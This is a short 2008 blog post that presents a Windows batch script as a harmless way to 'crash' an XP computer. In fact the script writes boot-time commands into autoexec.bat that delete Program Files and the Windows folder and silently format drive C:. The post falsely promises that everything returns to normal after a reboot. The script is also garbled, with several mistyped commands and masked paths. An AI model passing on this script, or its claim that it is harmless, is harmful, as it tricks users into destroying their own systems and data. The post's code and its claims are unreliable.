How to crash a computer on Windows XP
No Comments Written by
Ronald on
March 14, 2008 – 7:00 pm
First open a notepad.txt copy the lines quoted below, then save as autoexec.bat - then double click your batch file. It’s really easy and harmless
- when you reboot the computer everything should be back to normal.
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat
